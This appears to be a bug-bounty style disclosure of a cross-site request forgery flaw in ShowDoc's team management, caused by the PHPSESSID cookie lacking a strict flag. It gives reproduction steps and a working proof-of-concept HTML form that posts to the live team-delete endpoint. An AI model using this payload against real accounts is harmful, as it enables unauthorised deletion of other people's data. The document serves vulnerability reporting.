You set the strict
flag only for one of your cookies named cookie_token
but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name PHPSESSID
don’t have strict
flag.
1.replace 38046
with the team id
2.open poc.html and click on submit button.
3.after that the team with id 38046
or your replaced team id will be deleted.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
<input type="hidden" name="id" value="38046" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>